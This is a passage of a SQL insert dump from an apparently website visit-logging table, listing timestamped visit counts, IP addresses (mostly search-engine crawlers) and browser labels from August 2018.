6.249.66.155',''),(290878,1534684998,1,1,0,0,'54.36.149.21','other'),(290879,1534685797,1,1,0,0,'54.36.148.164','other'),(290880,1534685923,1,1,0,0,'178.154.171.88','other'),(290881,1534686064,2,0,2,0,'66.249.66.59',''),(290882,1534686077,1,1,0,0,'54.36.148.186','other'),(290883,1534686085,1,1,0,0,'54.36.148.59','other'),(290884,1534686247,1,0,1,0,'66.249.66.61',''),(290885,1534686487,1,1,0,0,'91.196.178.184','chrome'),(290886,1534686703,1,1,0,0,'54.36.149.91','other'),(290887,1534686834,1,1,0,0,'54.36.148.66','other'),(290888,1534686898,2,2,0,0,'216.244.66.241','other'),(290889,1534686994,1,1,0,0,'54.36.149.18','other'),(290890,1534687092,1,1,0,0,'46.211.155.98','chrome'),(290891,1534687366,1,1,0,0,'54.36.148.13','other'),(290892,1534687367,1,1,0,0,'54.36.148.255','other'),(290893,1534687473,1,1,0,0,'54.36.148.212','other'),(290894,1534687493,1,1,0,0,'54.36.148.43','other'),(290895,1534687526,1,1,0,0,'54.36.149.30','other'),(290896,1534687747,1,1,0,0,'93.73.137.167','chrome'),(290897,1534688233,1,1,0,0,'91.196.178.101','chrome'),(290898,1534688503,1,1,0,0,'8.29.198.27','other'),(290899,1534688512,1,1,0,0,'54.36.148.42','other'),(290900,1534688529,1,0,1,0,'66.249.66.157',''),(290901,1534688659,1,1,0,0,'66.249.66.156','chrome'),(290902,1534688751,1,1,0,0,'54.36.149.23','other'),(290903,1534689257,1,1,0,0,'54.36.148.58','other'),(290904,1534689269,1,1,0,0,'54.36.148.207','other'),(290905,1534689307,1,1,0,0,'54.36.149.89','other'),(290906,1534689320,1,1,0,0,'157.55.39.126','other'),(290907,1534689361,1,1,0,0,'54.36.148.180','other'),(290908,1534689408,1,1,0,0,'54.36.148.186','other'),(290909,1534689486,1,1,0,0,'54.36.149.42','other'),(290910,1534689548,1,1,0,0,'54.36.148.142','other'),(290911,1534689640,1,0,1,0,'66.249.66.156',''),(290912,1534689664,1,1,0,0,'54.36.148.203','other'),(290913,1534689669,1,1,0,0,'54.36.148.113','other'),(290914,1534689703,1,1,0,0,'54.36.148.34','other'),(290915,1534689904,1,1,0,0,'54.36.148.254','other'),(290916,1534690015,1,1,0,0,'54.36.148.191','other'),(290917,1534690558,1,1,0,0,'54.36.148.112','other'),(290918,1534690705,1,1,0,0,'54.36.148.199','other'),(290919,1534690906,1,1,0,0,'69.171.251.4','other'),(290920,1534691553,3,0,3,0,'66.249.66.156',''),(290921,1534691700,2,2,0,0,'141.8.142.74','other'),(290922,1534692076,1,1,0,0,'54.165.59.7','other'),(290923,1534692153,1,1,0,0,'54.36.148.170','other'),(290924,1534692336,1,1,0,0,'66.249.66.155','chrome'),(290925,1534692361,1,1,0,0,'69.171.251.12','other'),(290926,1534692504,1,1,0,0,'54.36.148.70','other'),(290927,1534692545,1,1,0,0,'95.163.255.92','other'),(290928,1534692798,1,1,0,0,'92.113.189.235','chrome'),(290929,1534692859,1,1,0,0,'37.54.19.109','firefox'),(290930,1534692980,1,1,0,0,'54.36.148.162','other'),(290931,1534693015,1,0,1,0,'66.249.66.75',''),(290932,1534693123,1,1,0,0,'54.36.148.43','other'),(290933,1534693149,1,0,1,0,'66.249.66.156',''),(290934,1534693512,2,0,2,0,'66.249.66.155',''),(290935,1534693637,1,1,0,0,'216.244.66.241','other'),(290936,1534693848,1,1,0,0,'54.36.148.233','other'),(290937,1534693937,1,1,0,0,'54.36.148.188','other'),(290938,1534693961,1,1,0,0,'54.36.148.154','other'),(290939,1534694017,1,1,0,0,'178.154.171.88','other'),(290940,1534694084,1,0,1,0,'66.249.66.74',''),(290941,1534694267,1,1,0,0,'54.36.148.90','other'),(290942,1534694410,1,1,0,0,'207.46.13.16','other'),(290943,1534694855,1,1,0,0,'54.36.149.10','other'),(290944,1534694927,1,1,0,0,'54.36.149.103','other'),(290945,1534694949,1,1,0,0,'54.36.149.89','other'),(290946,1534695032,1,1,0,0,'54.36.148.226','other'),(290947,1534695033,1,1,0,0,'54.36.148.93','other'),(290948,1534695122,1,1,0,0,'54.36.149.55','other'),(290949,1534695131,1,1,0,0,'95.163.255.192','other'),(290950,1534695285,2,0,2,0,'66.249.66.155',''),(290951,1534695386,1,1,0,0,'54.36.148.172','other'),(290952,1534695405,1,1,0,0,'54.36.148.84','other'),(290953,1534695456,1,1,0,0,'207.46.13.16','other'),(290954,1534695485,1,1,0,0,'54.36.148.82','other'),(290955,1534695551,1,0,1,0,'66.249.66.157',''),(290956,1534695605,1,1,0,0,'54.36.148.238','other'),(290957,1534695843,2,1,1,0,'66.249.66.157',''),(290958,1534696011,2,2,0,0,'216.244.66.241','other'),(290959,1534696039,1,1,0,0,'54.36.149.75','other'),(290960,1534696161,1,1,0,0,'95.133.153.194','chrome'),(290961,1534696243,1,1,0,0,'54.36.148.224','other'),(290962,1534696266,1,1,0,0,'54.36.148.119','other'),(290963,1534696416,2,0,2,0,'66.249.66.156',''),(290964,1534696528,1,1,0,0,'54.36.148.89','other'),(290965,1534696745,1,1,0,0,'40.77.167.120','other'),(290966,1534696749,1,1,0,0,'54.36.148.29','other'),(290967,1534696897,2,0,2,0,'66.249.66.155',''),(290968,1534697023,1,1,0,0,'54.36.148.200','other'),(290969,1534697485,1,1,0,0,'141.8.132.19','other'),(290970,1534698029,3,3,0,0,'216.244.66.241','other'),(290971,1534698038,1,1,0,0,'54.36.148.124','other'),(290972,1534698055,1,1,0,0,'54.36.148.220','other'),(290973,1534698096,1,1,0,0,'54.36.148.81','other'),(290974,1534698115,1,1,0,0,'54.36.148.216','other'),(290975,1534698340,1,1,0,0,'54.36.148.43','other'),(290976,1534698839,2,0,2,0,'66.249.66.157',''),(290977,1534698861,1,1,0,0,'54.36.148.255','other'),(290978,1534699008,1,1,0,0,'82.145.221.128','chrome'),(290979,1534699017,1,1,0,0,'54.36.149.23','other'),(290980,1534699038,1,1,0,0,'54.36.148.84','other'),(290981,1534699097,1,1,0,0,'54.36.148.34','other'),(290982,1534699130,1,1,0,0,'54.36.148.30','other'),(290983,1534699342,1,1,0,0,'8.29.198.26','other'),(290984,1534699355,1,1,0,0,'54.36.148.252','other'),(290985,1534699393,1,1,0,0,'54.36.148.136','other'),(290986,1534699397,1,0,1,0,'66.249.66.155',''),(290987,1534699597,1,1,0,0,'216.244.66.241','other'),(290988,1534699848,1,1,0,0,'54.36.149.64','other'),(290989,1534700051,1,1,0,0,'54.36.148.25','other'),(290990,1534700149,1,1,0,0,'54.36.148.145','other'),(290991,1534700210,1,1,0,0,'178.154.171.88','other'),(290992,1534700286,1,1,0,0,'54.36.149.57','other'),(290993,1534700423,1,1,0,0,'54.36.149.59','other'),(290994,1534700761,1,1,0,0,'54.36.148.196','other'),(290995,1534700953,1,1,0,0,'54.36.148.134','other'),(290996,1534700970,1,1,0,0,'54.36.149.35','other'),(290997,1534700981,1,1,0,0,'141.8.142.74','other'),(290998,1534700994,1,1,0,0,'54.36.148.212','other'),(290999,1534701012,1,0,1,0,'66.249.66.155',''),(291000,1534701275,1,1,0,0,'54.36.149.9','other'),(291001,1534701421,1,0,1,0,'66.249.66.156',''),(291002,1534701440,1,1,0,0,'66.249.66.156','chrome'),(291003,1534701626,2,2,0,0,'54.36.148.72','other'),(291004,1534701693,1,1,0,0,'54.36.148.241','other'),(291005,1534701791,1,1,0,0,'54.36.148.100','other'),(291006,1534701880,1,1,0,0,'54.36.148.93','other'),(291007,1534701892,1,1,0,0,'54.36.149.34','other'),(291008,1534701936,1,1,0,0,'54.36.148.12','other'),(291009,1534701944,1,1,0,0,'54.36.148.177','other'),(291010,1534701950,1,1,0,0,'54.36.148.73','other'),(291011,1534701981,1,1,0,0,'54.36.148.118','other'),(291012,1534702173,2,2,0,0,'178.154.171.88','other'),(291013,1534702232,1,1,0,0,'54.36.148.13','other'),(291014,1534702634,1,1,0,0,'54.36.148.163','other'),(291015,1534702725,1,1,0,0,'54.36.149.94','other'),(291016,1534702842,1,1,0,0,'54.36.149.80','other'),(291017,1534703218,1,0,1,0,'66.249.66.155',''),(291018,1534703241,1,1,0,0,'54.36.148.102','other'),(291019,1534703351,1,1,0,0,'54.36.149.22','other'),(291020,1534703632,1,1,0,0,'54.36.148.149','other'),(291021,1534703668,1,1,0,0,'54.36.148.98','other'),(291022,1534703895,1,1,0,0,'95.163.255.94','other'),(291023,1534703948,1,1,0,0,'141.8.142.74','other'),(291024,1534703971,1,1,0,0,'54.36.148.71','other'),(291025,1534704027,1,1,0,0,'87.250.224.46','other'),(291026,1534704047,1,1,0,0,'54.36.148.62','other'),(291027,1534704225,1,1,0,0,'54.36.149.33','other'),(291028,1534704243,1,1,0,0,'54.36.149.98','other'),(291029,1534704360,1,1,0,0,'54.36.148.224','other'),(291030,1534704791,1,1,0,0,'207.46.13.16','other'),(291031,1534704836,1,0,1,0,'66.249.66.75',''),(291032,1534704838,1,0,1,0,'66.249.66.74',''),(291033,1534704842,1,1,0,0,'66.249.66.74','chrome'),(291034,1534705081,1,1,0,0,'54.36.148.157','other'),(291035,1534705110,1,1,0,0,'54.36.148.205','other'),(291036,1534705295,1,0,1,0,'66.249.66.157',''),(291037,1534705330,1,1,0,0,'54.36.148.218','other'),(291038,1534705524,1,1,0,0,'54.36.148.239','other'),(291039,1534705671,1,1,0,0,'54.36.148.85','other'),(291040,1534705749,1,1,0,0,'40.77.167.120','other'),(291041,1534705821,1,1,0,0,'216.244.66.241','other'),(291042,1534705849,1,1,0,0,'92.112.249.162','chrome'),(291043,1534705853,1,1,0,0,'54.36.149.99','other'),(291044,1534705919,1,1,0,0,'54.36.148.200','other'),(291045,1534706020,1,1,0,0,'54.36.148.43','other'),(291046,1534706198,1,1,0,0,'51.255.65.46','other'),(291047,1534706253,1,1,0,0,'54.36.149.22','other'),(291048,1534706343,1,1,0,0,'54.36.149.85','other'),(291049,1534706363,1,0,1,0,'66.249.66.157',''),(291050,1534706635,1,1,0,0,'54.36.148.127','other'),(291051,1534706761,1,1,0,0,'54.36.148.246','other'),(291052,1534706935,1,1,0,0,'54.36.148.151','other'),(291053,1534707253,1,0,1,0,'66.249.66.156',''),(291054,1534707289,1,1,0,0,'54.36.149.19','other'),(291055,1534707525,1,1,0,0,'54.36.148.61','other'),(291056,1534707618,1,1,0,0,'54.36.148.152','other'),(291057,1534707731,1,1,0,0,'54.36.148.38','other'),(291058,1534707793,1,1,0,0,'54.36.149.93','other'),(291059,1534708086,1,1,0,0,'54.36.148.234','other'),(291060,1534708334,1,1,0,0,'54.36.148.68','other'),(291061,1534708482,1,1,0,0,'54.36.148.187','other'),(291062,1534708507,1,1,0,0,'54.36.148.213','other'),(291063,1534708709,1,1,0,0,'54.36.148.136','other'),(291064,1534708769,1,1,0,0,'54.36.148.227','other'),(291065,1534708973,1,0,1,0,'66.249.66.156',''),(291066,1534708998,1,0,1,0,'66.249.66.155',''),(291067,1534709124,1,1,0,0,'54.36.148.88','other'),(291068,1534709469,1,1,0,0,'54.36.148.172','other'),(291069,1534709474,2,1,1,0,'66.249.66.74',''),(291070,1534709550,1,1,0,0,'52.53.201.78','chrome'),(291071,1534709750,1,1,0,0,'54.36.149.39','other'),(291072,1534709794,1,1,0,0,'54.36.148.192','other'),(291073,1534709889,2,0,2,0,'66.249.66.156',''),(291074,1534709920,1,1,0,0,'54.36.148.114','other'),(291075,1534709949,1,1,0,0,'141.8.142.74','other'),(291076,1534710179,1,1,0,0,'8.29.198.26','other'),(291077,1534710363,1,1,0,0,'54.36.148.75','other'),(291078,1534710627,1,1,0,0,'54.36.149.96','other'),(291079,1534710783,1,1,0,0,'54.36.149.6','other'),(291080,1534710949,1,1,0,0,'178.154.171.88','other'),(291081,1534711295,1,1,0,0,'54.36.148.178','other'),(291082,1534711407,1,1,0,0,'54.36.148.152','other'),(291083,1534711476,1,1,0,0,'37.145.230.150','chrome'),(291084,1534711496,1,1,0,0,'207.46.13.16','other'),(291085,1534711528,1,1,0,0,'141.8.142.74','other'),(291086,1534711631,1,1,0,0,'54.36.149.41','other'),(291087,1534712052,1,1,0,0,'87.250.224.46','other'),(291088,1534712054,1,1,0,0,'40.77.167.120','other'),(291089,1534712396,1,1,0,0,'54.36.149.73','other'),(291090,1534712523,1,1,0,0,'66.249.66.157','chrome'),(291091,1534712677,2,2,0,0,'141.8.142.74','other'),(291092,1534712729,1,1,0,0,'54.36.148.65','other'),(291093,1534712841,1,1,0,0,'54.36.148.137','other'),(291094,1534713007,1,1,0,0,'54.36.149.101','other'),(291095,1534713213,1,1,0,0,'54.36.148.99','other'),(291096,1534713301,1,1,0,0,'54.36.149.11','other'),(291097,1534713434,3,0,3,0,'66.249.66.157',''),(291098,1534713575,1,1,0,0,'54.36.148.179','other'),(291099,1534713714,1,1,0,0,'216.244.66.241','other'),(291100,1534713823,1,1,0,0,'213.180.203.8','other'),(291101,1534713876,2,0,2,0,'66.249.66.155',''),(291102,1534713922,17,17,0,0,'95.216.0.38','other'),(291104,1534713925,16,16,0,0,'95.216.15.189','other'),(291105,1534714059,1,1,0,0,'54.36.148.154','other'),(291106,1534714126,1,0,1,0,'66.249.66.75',''),(291107,1534714301,1,0,1,0,'66.249.66.156',''),(291108,1534714416,1,1,0,0,'54.36.148.196','other'),(291109,1534714571,1,1,0,0,'54.36.148.99','other'),(291110,1534714581,1,1,0,0,'66.249.66.76','chrome'),(291111,1534714745,1,1,0,0,'54.36.148.74','other'),(291112,1534714896,1,1,0,0,'54.36.149.38','other'),(291113,1534715042,1,1,0,0,'54.36.148.187','other'),(291114,1534715530,2,0,2,0,'66.249.66.156',''),(291115,1534715689,1,1,0,0,'141.8.142.74','other'),(291116,1534715695,1,1,0,0,'95.163.255.93','other'),(291117,1534715755,1,1,0,0,'54.36.148.14','other'),(291118,1534715809,1,1,0,0,'216.244.66.241','other'),(291119,1534715963,1,1,0,0,'54.36.149.46','other'),(291120,1534716266,1,1,0,0,'54.36.149.17','other'),(291121,1534716341,1,1,0,0,'54.36.149.28','other'),(291122,1534716390,1,1,0,0,'54.36.148.226','other'),(291123,1534716624,1,1,0,0,'54.36.148.28','other'),(291124,1534716974,1,1,0,0,'216.244.66.241','other'),(291125,1534717231,1,1,0,0,'54.36.148.81','other'),(291126,1534717311,1,1,0,0,'54.36.148.130','other'),(291127,1534717332,1,1,0,0,'54.36.148.112','other'),(291128,1534717487,1,1,0,0,'54.36.148.42','other'),(291129,1534717678,1,1,0,0,'54.36.149.64','other'),(291130,1534717881,1,1,0,0,'54.36.148.202','other'),(291131,1534718242,1,1,0,0,'66.249.66.157','chrome'),(291132,1534718408,1,1,0,0,'54.36.149.46','other'),(291133,1534718450,1,1,0,0,'54.36.148.190','other'),(291134,1534718785,1,1,0,0,'54.36.148.193','other'),(291135,1534719078,1,0,1,0,'66.249.66.76',''),(291136,1534719131,1,1,0,0,'54.36.148.103','other'),(291137,1534719780,1,1,0,0,'54.36.149.19','other'),(291138,1534720170,1,0,1,0,'66.249.66.157',''),(291139,1534720229,1,1,0,0,'66.249.66.75','chrome'),(291140,1534720429,1,0,1,0,'66.249.66.155',''),(291141,1534720481,1,1,0,0,'54.36.149.54','other'),(291142,1534720741,1,1,0,0,'54.36.148.202','other'),(291143,1534721021,1,1,0,0,'8.29.198.26','other'),(291144,1534721057,1,1,0,0,'54.36.149.59','other'),(291145,1534721076,1,1,0,0,'54.36.149.70','other'),(291146,1534721340,1,0,1,0,'66.249.66.156',''),(291147,1534721454,1,1,0,0,'54.36.149.66','other'),(291148,1534721485,1,1,0,0,'54.36.148.10','other'),(291149,1534721713,1,0,1,0,'66.249.66.155',''),(291150,1534721801,1,1,0,0,'54.36.149.33','other'),(291151,1534721886,1,1,0,0,'54.36.148.239','other'),(291152,1534721993,1,1,0,0,'141.8.142.74','other'),(291153,1534722223,1,1,0,0,'54.36.148.160','other'),(291154,1534722340,1,1,0,0,'54.36.148.195','other'),(291155,1534722769,1,1,0,0,'162.210.196.98','other'),(291156,1534722878,2,0,2,0,'66.249.66.157',''),(291157,1534723080,2,0,2,0,'66.249.66.155',''),(291158,1534723176,1,1,0,0,'54.36.149.25','other'),(291159,1534723186,1,1,0,0,'54.36.148.163','other'),(291160,1534723799,1,1,0,0,'54.36.149.61','other'),(291161,1534724000,1,1,0,0,'54.36.148.35','other'),(291162,1534724315,1,1,0,0,'54.36.148.140','other'),(291163,1534724367,1,1,0,0,'66.249.66.156','chrome'),(291164,1534724410,1,1,0,0,'95.163.255.98','other'),(291165,1534724538,1,1,0,0,'37.9.113.182','other'),(291166,1534724566,1,1,0,0,'216.244.66.241','other'),(291167,1534724748,1,1,0,0,'54.36.148.165','other'),(291168,1534724775,1,1,0,0,'141.8.142.74','other'),(291169,1534724924,1,1,0,0,'54.36.148.64','other'),(291170,1534725316,1,1,0,0,'54.36.148.94','other'),(291171,1534725505,1,0,1,0,'66.249.66.155',''),(291172,1534725636,1,1,0,0,'66.249.66.75','chrome'),(291173,1534725651,1,1,0,0,'54.36.148.128','other'),(291174,1534725691,1,1,0,0,'54.36.149.31','other'),(291175,1534725695,1,1,0,0,'54.36.148.91','other'),(291176,1534725801,1,1,0,0,'54.36.148.40','other'),(291177,1534725898,1,1,0,0,'54.36.148.137','other'),(291178,1534725930,1,1,0,0,'54.36.148.73','other'),(291179,1534726068,1,1,0,0,'54.36.149.20','other'),(291180,1534726171,1,1,0,0,'54.36.149.47','other'),(291181,1534726245,1,0,1,0,'66.249.66.156',''),(291182,1534726333,1,1,0,0,'54.36.149.7','other'),(291183,1534726459,1,1,0,0,'54.36.148.225','other'),(291184,1534726466,1,1,0,0,'54.36.149.0','other'),(291185,1534726483,1,0,1,0,'66.249.66.155',''),(291186,1534726749,1,1,0,0,'54.36.148.202','other'),(291187,1534726922,1,1,0,0,'54.36.148.77','other'),(291188,1534727092,1,1,0,0,'54.36.148.90','other'),(291189,1534727243,1,1,0,0,'54.36.149.29','other'),(291190,1534727456,1,1,0,0,'54.36.148.218','other'),(291191,1534727638,1,1,0,0,'54.36.148.62','other'),(291192,1534727814,1,1,0,0,'54.36.149.59','other'),(291193,1534727920,1,1,0,0,'193.106.30.99','firefox'),(291194,1534727931,1,1,0,0,'37.9.113.182','other'),(291195,1534727985,1,1,0,0,'141.8.142.74','other'),(291196,1534728168,2,2,0,0,'54.36.148.100','other'),(291197,1534728301,1,1,0,0,'54.36.149.9','other'),(291198,1534728372,1,0,1,0,'66.249.66.74',''),(291199,1534728496,1,1,0,0,'54.36.148.214','other'),(291200,1534728663,1,1,0,0,'54.36.148.107','other'),(291201,1534728667,2,0,2,0,'66.249.66.155',''),(291202,1534728942,1,1,0,0,'54.36.148.85','other'),(291203,1534729218,1,1,0,0,'40.77.167.55','other'),(291204,1534729278,1,1,0,0,'54.36.148.177','other'),(291205,1534729311,1,1,0,0,'54.36.149.16','other'),(291206,1534729345,1,1,0,0,'54.36.148.119','other'),(291207,1534729403,1,1,0,0,'54.36.148.211','other'),(291208,1534729514,1,1,0,0,'54.36.148.156','other'),(291209,1534729686,1,1,0,0,'52.41.211.72','chrome'),(291210,1534730258,1,0,1,0,'66.249.66.157',''),(291211,1534730356,1,1,0,0,'54.36.149.33','other'),(291212,1534730448,1,0,1,0,'66.249.66.155',''),(291213,1534730468,1,1,0,0,'54.36.149.7','other'),(291214,1534730496,1,1,0,0,'54.36.148.162','other'),(291215,1534730545,1,1,0,0,'54.36.148.84','other'),(291216,1534730796,1,0,1,0,'66.249.66.156',''),(291217,1534730990,1,1,0,0,'54.36.149.106','other'),(291218,1534731150,1,1,0,0,'54.36.148.83','other'),(291219,1534731164,1,1,0,0,'66.249.66.75','chrome'),(291220,1534731191,1,1,0,0,'54.36.148.160','other'),(291221,1534731596,1,1,0,0,'54.36.149.74','other'),(291222,1534731821,1,0,1,0,'66.249.66.157',''),(291223,1534731878,1,1,0,0,'8.29.198.27','other'),(291224,1534732038,1,1,0,0,'54.36.149.9','other'),(291225,1534732276,1,1,0,0,'54.36.149.105','other'),(291226,1534732312,1,1,0,0,'54.36.148.74','other'),(291227,1534732782,1,0,1,0,'66.249.66.156',''),(291228,1534732826,1,1,0,0,'54.36.148.111','other'),(291229,1534732832,1,1,0,0,'54.36.148.81','other'),(291230,1534732951,1,1,0,0,'37.9.113.182','other'),(291231,1534732972,1,1,0,0,'141.8.142.74','other'),(291232,1534733259,1,1,0,0,'54.36.148.249','other'),(291233,1534733480,1,1,0,0,'95.163.255.168','other'),(291234,1534733502,1,1,0,0,'54.36.148.113','other'),(291235,1534733517,1,1,0,0,'92.113.189.235','chrome'),(291236,1534733519,1,1,0,0,'54.36.148.134','other'),(291237,1534733596,1,0,1,0,'66.249.66.157',''),(291238,1534733966,1,1,0,0,'54.36.148.112','other'),(291239,1534734205,1,1,0,0,'141.8.142.74','other'),(291240,1534734294,1,1,0,0,'54.36.148.119','other'),(291241,1534734328,1,1,0,0,'216.244.66.241','other'),(291242,1534734407,1,1,0,0,'54.36.148.72','other'),(291243,1534734633,1,1,0,0,'54.36.148.193','other'),(291244,1534734681,1,1,0,0,'54.36.148.28','other'),(291245,1534734753,1,0,1,0,'66.249.66.156',''),(291246,1534734929,3,0,3,0,'66.249.66.157',''),(291247,1534735008,2,0,2,0,'66.249.66.155',''),(291249,1534735091,1,1,0,0,'95.163.255.95','other'),(291250,1534735338,1,1,0,0,'54.36.148.35','other'),(291251,1534735542,1,1,0,0,'54.36.148.148','other'),(291252,1534735593,1,1,0,0,'54.36.148.150','other'),(291253,1534735656,1,1,0,0,'216.244.66.241','other'),(291254,1534735659,1,1,0,0,'54.36.149.70','other'),(291255,1534735884,1,1,0,0,'66.249.66.155','chrome'),(291256,1534735952,1,1,0,0,'54.36.148.200','other'),(291257,1534736323,1,1,0,0,'54.36.148.24','other'),(291258,1534736349,1,1,0,0,'54.36.148.90','other'),(291259,1534736556,1,1,0,0,'54.36.149.32','other'),(291260,1534736566,1,1,0,0,'54.36.149.42','other'),(291261,1534736944,1,0,1,0,'66.249.66.157',''),(291262,1534737177,1,0,1,0,'66.249.66.155',''),(291263,1534737224,1,1,0,0,'54.36.148.232','other'),(291264,1534737437,1,1,0,0,'216.244.66.241','other'),(291265,1534737611,1,1,0,0,'66.249.66.75','chrome'),(291266,1534737634,1,1,0,0,'54.36.149.76','other'),(291267,1534737639,2,2,0,0,'141.8.142.74','other'),(291268,1534737691,1,1,0,0,'54.36.148.31','other'),(291269,1534738007,1,1,0,0,'54.36.149.101','other'),(291270,1534738510,1,1,0,0,'54.36.148.160','other'),(291271,1534738717,1,1,0,0,'54.36.148.235','other'),(291272,1534738795,1,1,0,0,'46.211.7.174','other'),(291273,1534738929,1,1,0,0,'54.36.148.225','other'),(291274,1534738945,1,1,0,0,'216.244.66.241','other'),(291275,1534738967,1,1,0,0,'54.36.148.199','other'),(291276,1534739011,1,1,0,0,'54.36.148.23','other'),(291277,1534739125,1,1,0,0,'178.154.171.88','other'),(291278,1534739271,1,1,0,0,'54.36.148.66','other'),(291279,1534739353,1,1,0,0,'54.36.149.70','other'),(291280,1534739564,1,1,0,0,'54.36.148.144','other'),(291281,1534739722,1,1,0,0,'54.36.148.180','other'),(291282,1534740011,1,1,0,0,'54.36.148.36','other'),(291283,1534740072,1,1,0,0,'141.8.142.74','other'),(291284,1534740116,5,5,0,0,'5.9.154.68','other'),(291285,1534740384,1,1,0,0,'195.46.32.90','chrome'),(291286,1534740536,1,1,0,0,'54.36.148.126','other'),(291287,1534740576,1,1,0,0,'54.36.148.186','other'),(291288,1534740696,1,1,0,0,'54.36.148.81','other'),(291289,1534740800,1,1,0,0,'54.36.148.125','other'),(291290,1534740851,1,1,0,0,'54.36.148.90','other'),(291291,1534741100,1,1,0,0,'54.36.148.10','other'),(291292,1534741101,1,0,1,0,'66.249.66.155',''),(291293,1534741303,1,1,0,0,'54.36.148.135','other'),(291294,1534741332,2,0,2,0,'66.249.66.157',''),(291295,1534741361,1,1,0,0,'54.36.148.144','other'),(291296,1534741487,1,1,0,0,'54.36.148.244','other'),(291297,1534741533,1,1,0,0,'54.36.148.102','other'),(291298,1534741718,1,1,0,0,'54.36.149.80','other'),(291299,1534741811,2,1,1,0,'66.249.66.156',''),(291300,1534742126,1,1,0,0,'54.36.148.230','other'),(291301,1534742253,1,1,0,0,'54.36.149.32','other'),(291302,1534742304,2,2,0,0,'141.8.142.74','other'),(291303,1534742385,1,1,0,0,'54.36.148.201','other'),(291304,1534742714,1,1,0,0,'8.29.198.26','other'),(291305,1534742723,1,1,0,0,'54.36.148.250','other'),(291306,1534742912,1,0,1,0,'66.249.66.76',''),(291307,1534742978,1,1,0,0,'54.36.148.125','other'),(291308,1534743151,1,1,0,0,'207.46.13.16','other'),(291309,1534743260,1,1,0,0,'54.36.148.243','other'),(291310,1534743358,1,1,0,0,'193.106.30.99','firefox'),(291311,1534743446,1,1,0,0,'54.36.149.18','other'),(291312,1534744057,1,1,0,0,'66.249.66.75','chrome'),(291313,1534744100,1,1,0,0,'87.250.224.46','other'),(291314,1534744152,1,1,0,0,'66.102.9.134','chrome'),(291315,1534745046,1,1,0,0,'54.36.148.55','other'),(291316,1534745159,1,0,1,0,'66.249.66.75',''),(291317,1534745351,1,1,0,0,'54.36.148.141','other'),(291318,1534745427,1,1,0,0,'54.36.148.75','other'),(291319,1534745512,1,1,0,0,'54.36.148.210','other'),(291320,1534745595,1,1,0,0,'40.77.167.120','other'),(291321,1534745765,2,2,0,0,'141.8.142.74','other'),(291322,1534745790,1,1,0,0,'91.196.177.46','chrome'),(291323,1534745970,1,1,0,0,'216.244.66.241','other'),(291324,1534746006,1,1,0,0,'54.36.148.22','other'),(291325,1534746211,1,1,0,0,'54.36.148.14','other'),(291326,1534746283,1,1,0,0,'54.36.148.50','other'),(291327,1534746284,1,1,0,0,'54.36.148.244','other'),(291328,1534746456,1,1,0,0,'46.200.148.90','chrome'),(291329,1534746510,1,1,0,0,'54.36.149.73','other'),(291330,1534746596,1,1,0,0,'54.36.148.78','other'),(291331,1534746695,1,0,1,0,'66.249.66.156',''),(291332,1534746728,2,2,0,0,'157.55.39.126','other'),(291333,1534746787,1,1,0,0,'91.196.177.110','chrome'),(291334,1534746864,1,1,0,0,'178.93.61.45','chrome'),(291335,1534746915,1,1,0,0,'54.36.148.179','other'),(291336,1534747006,1,1,0,0,'54.36.148.32','other'),(291337,1534747034,1,1,0,0,'54.36.148.135','other'),(291338,1534747060,1,1,0,0,'54.36.148.35','other'),(291339,1534747103,1,1,0,0,'54.36.148.131','other'),(291340,1534747442,1,1,0,0,'46.211.102.197','chrome'),(291341,1534747503,2,2,0,0,'141.8.142.74','other'),(291342,1534747535,1,1,0,0,'54.36.148.187','other'),(291343,1534747729,1,1,0,0,'95.135.129.224','chrome'),(291344,1534747786,1,1,0,0,'54.36.148.50','other'),(291345,1534747859,1,1,0,0,'54.36.148.27','other'),(291346,1534747982,1,1,0,0,'54.36.148.147','other'),(291347,1534748007,1,1,0,0,'207.46.13.16','other'),(291348,1534748139,1,1,0,0,'91.196.178.168','chrome'),(291349,1534748177,1,1,0,0,'54.36.149.26','other'),(291350,1534748323,1,1,0,0,'54.36.149.38','other'),(291351,1534748750,1,1,0,0,'54.36.148.139','other'),(291352,1534748872,1,1,0,0,'54.36.149.60','other'),(291353,1534748931,8,8,0,0,'207.46.13.16','other'),(291354,1534748938,10,10,0,0,'40.77.167.120','other'),(291355,1534748959,5,5,0,0,'157.55.39.126','other'),(291356,1534748966,1,0,1,0,'66.249.66.156',''),(291357,1534748975,1,1,0,0,'141.8.142.74','other'),(291358,1534748996,10,10,0,0,'40.77.167.55','other'),(291359,1534749072,1,1,0,0,'95.163.255.98','other'),(291360,1534749339,1,1,0,0,'54.36.148.19','other'),(291361,1534749548,1,1,0,0,'216.244.66.241','other'),(291362,1534749792,1,1,0,0,'66.249.66.75','chrome'),(291363,1534749930,1,1,0,0,'54.36.148.191','other'),(291364,1534749950,1,1,0,0,'54.36.149.21','other'),(291365,1534750038,1,1,0,0,'54.36.148.71','other'),(291366,1534750075,1,1,0,0,'54.36.149.47','other'),(291367,1534750589,1,1,0,0,'54.36.148.117','other'),(291368,1534750618,1,1,0,0,'54.36.148.240','other'),(291369,1534750720,1,1,0,0,'54.36.148.242','other'),(291370,1534750797,2,2,0,0,'178.251.107.35','chrome'),(291371,1534751074,1,1,0,0,'54.36.149.95','other'),(291372,1534751545,1,1,0,0,'54.36.149.96','other'),(291373,1534751749,1,1,0,0,'141.8.142.74','other'),(291374,1534751834,1,1,0,0,'54.36.148.205','other'),(291375,1534751973,1,1,0,0,'54.36.148.89','other'),(291376,1534752045,1,1,0,0,'54.36.148.126','other'),(291377,1534752129,1,1,0,0,'216.244.66.241','other'),(291378,1534752218,1,1,0,0,'54.36.149.102','other'),(291379,1534752256,1,1,0,0,'54.36.148.220','other'),(291380,1534752263,1,1,0,0,'54.36.149.75','other'),(291381,1534752706,1,1,0,0,'199.59.150.181','other'),(291382,1534752710,1,1,0,0,'54.36.149.70','other'),(291383,1534752751,1,1,0,0,'178.95.66.69','chrome'),(291384,1534752881,1,1,0,0,'54.36.149.49','other'),(291385,1534752909,3,3,0,0,'69.30.226.234','other'),(291386,1534752999,1,1,0,0,'46.164.128.138','chrome'),(291387,1534753111,2,2,0,0,'173.234.159.250','other'),(291388,1534753302,1,1,0,0,'54.36.148.65','other'),(291389,1534753340,1,1,0,0,'54.36.148.55','other'),(291390,1534753504,1,1,0,0,'54.36.148.18','other'),(291391,1534753514,1,1,0,0,'54.36.148.214','other'),(291392,1534753556,1,1,0,0,'8.29.198.26','other'),(291393,1534753577,1,1,0,0,'54.36.148.240','other'),(291394,1534753656,1,1,0,0,'54.36.148.106','other'),(291395,1534753665,1,1,0,0,'54.36.148.87','other'),(291396,1